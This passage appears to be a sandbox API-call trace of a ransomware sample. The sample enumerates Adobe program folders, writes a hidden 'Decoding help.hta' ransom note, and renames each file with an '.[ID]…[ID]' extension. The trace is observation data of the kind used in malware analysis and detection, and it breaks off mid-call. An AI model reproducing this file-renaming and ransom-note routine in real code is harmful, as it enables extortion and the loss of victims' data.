lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*", lpFindFileData=0x211dfd30 | out: lpFindFileData=0x211dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6715f0 [0046.217] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0046.217] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x211dfd30 | out: lpFindFileData=0x211dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.217] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0046.217] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0046.217] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x211dfd30 | out: lpFindFileData=0x211dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0046.217] lstrcmpW (lpString1=".", lpString2="Security") returned -1 [0046.217] lstrcmpW (lpString1="..", lpString2="Security") returned -1 [0046.217] lstrcmpiW (lpString1="windows", lpString2="Security") returned 1 [0046.217] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" [0046.217] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned 51 [0046.217] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\", lpString2="Security" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0046.217] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0046.217] GlobalMemoryStatus (in: lpBuffer=0x211dfd10 | out: lpBuffer=0x211dfd10) [0046.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x42c [0046.296] CloseHandle (hObject=0x42c) returned 1 [0046.296] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x211dfd30 | out: lpFindFileData=0x211dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0046.296] FindClose (in: hFindFile=0x6715f0 | out: hFindFile=0x6715f0) returned 1 Thread: id = 496 os_tid = 0xc04 [0046.214] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*", lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f24da0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718f0 [0046.215] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0046.215] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f24da0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.292] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0046.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0046.292] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d912600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xfda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroIEHelper.dll", cAlternateFileName="ACROIE~1.DLL")) returned 1 [0046.292] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.292] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.293] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.293] CloseHandle (hObject=0xffffffff) returned 0 [0046.293] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.293] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroIEHelper.dll") returned 1 [0046.293] lstrlenW (lpString="AcroIEHelper.dll") returned 16 [0046.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.293] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroIEHelper.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" [0046.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" [0046.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0046.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.294] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf3a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroIEHelperShim.dll", cAlternateFileName="ACROIE~2.DLL")) returned 1 [0046.294] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.294] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.294] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.294] CloseHandle (hObject=0xffffffff) returned 0 [0046.294] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.294] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroIEHelperShim.dll") returned 1 [0046.294] lstrlenW (lpString="AcroIEHelperShim.dll") returned 20 [0046.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.294] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroIEHelperShim.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" [0046.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" [0046.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0046.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.333] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d984a20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.CAT", cAlternateFileName="")) returned 1 [0046.333] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.333] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.333] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.333] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.333] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.333] CloseHandle (hObject=0xffffffff) returned 0 [0046.333] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.333] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.CAT") returned 1 [0046.333] lstrlenW (lpString="AcroPDF.CAT") returned 11 [0046.333] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.334] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.334] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.CAT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT" [0046.334] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT" [0046.334] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT.[ID]g9uZrLhJaygpwRm1[ID]" [0046.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.353] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.CHS", cAlternateFileName="")) returned 1 [0046.353] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.353] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.353] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.353] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.353] CloseHandle (hObject=0xffffffff) returned 0 [0046.354] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.CHS") returned 1 [0046.354] lstrlenW (lpString="AcroPDF.CHS") returned 11 [0046.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.CHS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS" [0046.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS" [0046.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS.[ID]g9uZrLhJaygpwRm1[ID]" [0046.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.chs.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.372] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.CHT", cAlternateFileName="")) returned 1 [0046.372] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.372] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.372] GetFileAttributesW 